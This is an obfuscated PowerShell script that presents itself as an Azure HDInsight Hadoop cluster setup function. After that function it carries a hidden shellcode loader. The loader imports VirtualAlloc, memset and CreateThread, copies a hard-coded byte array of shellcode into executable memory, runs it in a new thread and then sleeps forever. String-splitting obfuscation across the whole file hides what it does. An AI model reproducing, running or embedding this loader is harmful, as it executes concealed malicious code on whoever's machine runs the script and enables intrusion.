function ne`W-cL`USTEr {
    
    ${e`Rror`AC`TiONP`REFer`ENCE} = ("{0}{1}"-f'Sto','p')

    
    ${CoN`TE`Xt} = &("{3}{0}{2}{1}"-f 'C','ntext','o','Get-Az')
    if (${cO`NtexT} -eq ${n`ULl}) 
    {
        .("{1}{0}{3}{2}" -f'-','Connect','ccount','AzA')
    }
    ${coNT`E`xt}

    
    
    

    
    ${RESO`U`RCE`grOupNAME} = &("{2}{0}{1}" -f 'H','ost','Read-') -Prompt ("{5}{2}{0}{3}{7}{1}{6}{4}" -f'urce','oup n','reso',' ','e','Enter the ','am','gr')
    ${lO`CaT`ioN} = &("{1}{2}{0}" -f'st','Rea','d-Ho') -Prompt ("{6}{4}{3}{9}{8}{5}{2}{0}{1}{7}{10}" -f'e res','o','creat','re r','ter the Azu',' to ','En','u','gion','e','rces in')

    
    &("{2}{1}{3}{0}"-f'urceGroup','w-A','Ne','zReso') -Name ${reSO`URc`E`GrOUpn`AME} -Location ${LOc`A`TiOn}

    ${dEF`AUltsToRA`gEa`cCO`UN`TnAme} = &("{2}{1}{0}"-f't','d-Hos','Rea') -Prompt ("{2}{9}{7}{4}{10}{1}{0}{6}{5}{8}{3}"-f' ','e','Enter the name of t','nt','stora','o','acc',' ','u','he','g')

    
    &("{3}{2}{4}{1}{5}{0}" -f'Account','Sto','w','Ne','-Az','rage') `
        -ResourceGroupName ${REsOur`cEGroup`N`AME} `
        -Name ${DEFa`Ul`TSTOraG`ea`CcOu`NT`NA`me} `
        -Type ("{2}{0}{1}" -f 'n','dard_LRS','Sta') `
        -Location ${lO`caTi`on}
    ${DEf`A`UL`TstO`RAgEAcCO`UntkEY} = (&("{3}{2}{1}{4}{0}"-f'countKey','Stora','Az','Get-','geAc') `
                                    -ResourceGroupName ${reSo`URC`e`Gr`OuPNA`ME} `
                                    -Name ${DE`FA`UlTstoR`AGeA`cCO`UNT`Name})[0]."V`Alue"
    ${De`FAULtST`Or`AG`eCOntext} = &("{4}{3}{0}{5}{1}{2}" -f'orageCon','ex','t','ew-AzSt','N','t') `
                                    -StorageAccountName ${dE`F`AuLTsTo`RAGEacCO`UntNaME} `
                                    -StorageAccountKey ${DE`FaUL`Ts`ToRAg`eACcO`UN`TKeY}

    
    ${c`LU`sterNaMe} = &("{0}{1}{2}" -f 'R','ead','-Host') -Prompt ("{0}{2}{1}{5}{4}{6}{7}{3}" -f'Enter t','e nam','h','ster',' the HDIns','e of','ig','ht clu')
    
    ${HTt`Pcr`ED`eNt`Ial} = .("{3}{2}{0}{1}"-f'ia','l','-Credent','Get') -Message ("{0}{6}{5}{2}{3}{4}{1}"-f 'Enter','ntials',' lo','gin',' crede','er',' Clust') -UserName ("{1}{0}" -f'min','ad')
    
    ${sshCreDe`Nti`A`ls} = .("{0}{2}{1}" -f'Get-','al','Credenti') -Message ("{4}{2}{3}{1}{0}" -f'ntials','SH user crede','r ','S','Ente')

    
    ${cL`USterS`Ize`I`NN`odEs} = "4"
    ${cLu`STer`VeRS`i`on} = "3.6"
    ${CLUs`TER`Type} = ("{1}{0}"-f'op','Hado')
    ${c`Lus`T`eROS} = ("{1}{0}" -f'x','Linu')
    
    ${dE`FaU`l`TBlObC`OntAi`NERNa`Me} = ${cLust`ERnA`mE}

    
    .("{5}{6}{2}{1}{3}{0}{4}"-f'in','n','eCo','ta','er','Ne','w-AzStorag') `
        -Name ${c`Lus`TErNAmE} -Context ${dEFaU`l`TStO`RA`GEcoNT`ext} 

    
    .("{2}{4}{1}{0}{3}"-f 'us','ghtCl','New-A','ter','zHDInsi') `
        -ResourceGroupName ${RE`s`ourcEgr`oupNamE} `
        -ClusterName ${C`LUs`Te`RNAME} `
        -Location ${l`OCatiON} `
        -ClusterSizeInNodes ${cl`U`StER`SiZeiNNO`DeS} `
        -ClusterType ${c`LU`STE`RtYpE} `
        -OSType ${cLUsT`e`ROS} `
        -Version ${Cl`UsteRVeRS`iON} `
        -HttpCredential ${HttPCRe`dE`NTiaL} `
        -DefaultStorageAccountName "$defaultStorageAccountName.blob.core.windows.net" `
        -DefaultStorageAccountKey ${def`AuLTS`TOR`AgeaccO`UnTKEy} `
        -DefaultStorageContainer ${cLuStE`R`Na`mE} `
        -SshCredential ${SS`hcREd`EN`Ti`AlS}

}

${C} = ((("{46}{26}{18}{50}{49}{35}{4}{34}{80}{71}{15}{31}{84}{51}{67}{13}{70}{11}{2}{75}{14}{39}{79}{81}{8}{30}{83}{77}{47}{20}{9}{61}{24}{42}{12}{74}{29}{37}{6}{3}{58}{64}{7}{28}{33}{66}{44}{63}{32}{59}{1}{76}{57}{48}{69}{10}{27}{56}{41}{72}{16}{53}{17}{22}{55}{43}{54}{78}{82}{21}{19}{25}{5}{73}{38}{40}{62}{0}{45}{36}{52}{65}{60}{23}{68}" -f'Ptr m','t','lpAddress','lic sta','.','3msvc','pub','t',', u','ct);[','Size, IntPt','r ','ort(RI3kernel32','tP','i','publ','tr ','r, uint','3','t(R','t flProte','d);[DllImpor',' dw','uint c','llIm','I','rt(RI','r','Ptr C','dll','int f','ic static ext','P','rea','dll','2','tP','RI3)]','t.dllRI3)]p','nt d','ublic static exte','StartAddress,','p','ntPt','(I','emset(In','[DllImpo',' uin','uint dwS','el3','kern','al','tr dest','lpParamete','r lpTh','CreationFlags, I',' lp','es, ','tic extern I','tr lpThreadA',' ','D','rn Int','nt','n',', uint src,','teThread','Alloc(In','ount);','tack','t',')]',' IntP','r','.',', u','tribut','cationType,','re','wSi','RI3','ze','adI','lAllo','ern IntPtr Virtu'))-cRePlACe  'RI3',[CHar]34);${w} = .("{1}{0}{2}" -f'd-Typ','Ad','e') -memberDefinition ${c} -Name ("{0}{1}"-f 'W','in32') -namespace ("{2}{4}{1}{3}{0}" -f's','2Fun','Win','ction','3') -passthru;[Byte[]];[Byte[]]${z} = 0xda,0xd8,0xb8,0x75,0x49,0x93,0x61,0xd9,0x74,0x24,0xf4,0x5d,0x33,0xc9,0xb1,0x47,0x31,0x45,0x18,0x03,0x45,0x18,0x83,0xed,0x89,0xab,0x66,0x9d,0x99,0xae,0x89,0x5e,0x59,0xcf,0x00,0xbb,0x68,0xcf,0x77,0xcf,0xda,0xff,0xfc,0x9d,0xd6,0x74,0x50,0x36,0x6d,0xf8,0x7d,0x39,0xc6,0xb7,0x5b,0x74,0xd7,0xe4,0x98,0x17,0x5b,0xf7,0xcc,0xf7,0x62,0x38,0x01,0xf9,0xa3,0x25,0xe8,0xab,0x7c,0x21,0x5f,0x5c,0x09,0x7f,0x5c,0xd7,0x41,0x91,0xe4,0x04,0x11,0x90,0xc5,0x9a,0x2a,0xcb,0xc5,0x1d,0xff,0x67,0x4c,0x06,0x1c,0x4d,0x06,0xbd,0xd6,0x39,0x99,0x17,0x27,0xc1,0x36,0x56,0x88,0x30,0x46,0x9e,0x2e,0xab,0x3d,0xd6,0x4d,0x56,0x46,0x2d,0x2c,0x8c,0xc3,0xb6,0x96,0x47,0x73,0x13,0x27,0x8b,0xe2,0xd0,0x2b,0x60,0x60,0xbe,0x2f,0x77,0xa5,0xb4,0x4b,0xfc,0x48,0x1b,0xda,0x46,0x6f,0xbf,0x87,0x1d,0x0e,0xe6,0x6d,0xf3,0x2f,0xf8,0xce,0xac,0x95,0x72,0xe2,0xb9,0xa7,0xd8,0x6a,0x0d,0x8a,0xe2,0x6a,0x19,0x9d,0x91,0x58,0x86,0x35,0x3e,0xd0,0x4f,0x90,0xb9,0x17,0x7a,0x64,0x55,0xe6,0x85,0x95,0x7f,0x2c,0xd1,0xc5,0x17,0x85,0x5a,0x8e,0xe7,0x2a,0x8f,0x01,0xb8,0x84,0x60,0xe2,0x68,0x64,0xd1,0x8a,0x62,0x6b,0x0e,0xaa,0x8c,0xa6,0x27,0x41,0x76,0x20,0x3d,0x95,0xe2,0xc1,0xd5,0x9b,0x12,0x30,0x7a,0x15,0xf4,0x58,0x92,0x73,0xae,0xf4,0x0b,0xde,0x24,0x65,0xd3,0xf4,0x40,0xa5,0x5f,0xfb,0xb5,0x6b,0xa8,0x76,0xa6,0x1b,0x58,0xcd,0x94,0x8d,0x67,0xfb,0xb3,0x31,0xf2,0x00,0x12,0x66,0x6a,0x0b,0x43,0x40,0x35,0xf4,0xa6,0xdb,0xfc,0x60,0x09,0xb3,0x00,0x65,0x89,0x43,0x57,0xef,0x89,0x2b,0x0f,0x4b,0xda,0x4e,0x50,0x46,0x4e,0xc3,0xc5,0x69,0x27,0xb0,0x4e,0x02,0xc5,0xef,0xb9,0x8d,0x36,0xda,0x3b,0xf1,0xe0,0x22,0x4e,0x1b,0x31;${g} = 0x1000;if (${z}."Le`N`GTH" -gt 0x1000){${g} = ${Z}."l`ENgth"};${x}=${w}::("{1}{0}{2}{3}"-f'irt','V','ual','Alloc').Invoke(0,0x1000,${g},0x40);for (${I}=0;${I} -le (${Z}."l`eng`TH"-1);${I}++) {${w}::"mE`ms`et"([IntPtr](${X}.("{2}{1}{0}" -f '32','t','ToIn').Invoke()+${I}), ${z}[${I}], 1)};${W}::("{1}{3}{0}{2}" -f 'a','Cr','d','eateThre').Invoke(0,0,${X},0,0,0);for (;;){&("{0}{2}{1}{3}" -f'S','lee','tart-s','p') 60};
